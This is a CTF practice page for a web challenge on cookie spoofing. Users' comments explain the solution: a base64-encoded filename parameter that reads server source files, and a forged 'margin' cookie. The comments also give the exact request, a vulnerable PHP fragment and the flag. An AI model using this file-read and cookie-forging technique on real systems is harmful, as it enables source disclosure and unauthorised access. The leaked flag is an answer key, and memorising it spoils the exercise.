cookiesWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: jiangdie666
一血奖励: 1金币
解  决: 6241
提  示:
描  述:
cookies欺骗
评论
moke1 2年前

凡是启动金币大于奖励金币的一律不做

回复 19

嵌入式学的CTF 2年前

<?php error_reporting(0); $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); $line=isset($_GET['line'])?intval($_GET['line']):0; if($file=='') header("locat

回复 0

joyoung 2年前

链接推测出filename值为base64加密,改为index.php,将line从0开始,得出源代码审计得出解法,cookie设置margin=margin,line为0,请求后查看响应中包含flag

回复 0

zmcck 2年前

hackbar: url:http://114.67.175.224:12042/index.php?line=&filename=a2V5cy5waHA= cookie添加 margin=margin 执行后的空白页面,查看源码<!--?php $key="flag{6fd889776a1cbefdd76d72fe89195af5}"; ?-->

回复 0

Traherne 2年前

hackbar不管用啊,执行之后一片空白,源代码里也什么都没有

回复 0
Restwlaq 2年前

注意行号必须是空,如果?line=1时,即使hackbar提交了cookie,第二行没有内容也返回空白

回复 0

zdfy005 3年前

GET /index.php?line=&filename=a2V5cy5waHA= HTTP/1.1 Cookie:margin:margin

回复 0

zdfy005 3年前

题目是cookies,猜测是要设置cookie值。发现/index.php?line=filename=a2V5cy5waHA,显示了keys.txt内容,line应该是显示的行,尝试改成1或2后没有内容。将filename换成index.php的加密值,查看第十行看到if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='marg

回复 8

9023893 3年前

用火狐浏览器的hackbar 就可以的

回复 1

sudopacman 3年前

cookies写入以后发现网站是空白的,还以为自己思路错了(当时正开着hackbar),当时一个人憨憨地急了好久,最后调来调去发现原来flag在元素审查

回复 1

浩瀚 3年前

思来想去还是充了588的会员

回复 11
非常的Amazing 1年前

大哥牛逼‘’

回复 0

WriteUp

image
harry

3 金币

评分(13)

解题动态

MZH123456 攻破了该题 22小时前
zzuer 攻破了该题 22小时前
Fengyu3321 攻破了该题 1天前
zhangzy28 攻破了该题 1天前
邪恶的番茄 攻破了该题 1天前
demonsong 攻破了该题 2天前
白菜白又白 攻破了该题 2天前
igrazee 攻破了该题 2天前
liojuhsdf 攻破了该题 3天前
鲲中霸王 攻破了该题 4天前
out不慢 攻破了该题 4天前
bhcxzhdsa 攻破了该题 7天前
cthugha721 攻破了该题 7天前
lvzijian 攻破了该题 7天前
123456zxb 攻破了该题 8天前
ixin 攻破了该题 8天前
cccczz 攻破了该题 8天前
dragonX 攻破了该题 8天前
zrc2682 攻破了该题 9天前
exmored 攻破了该题 10天前
问题反馈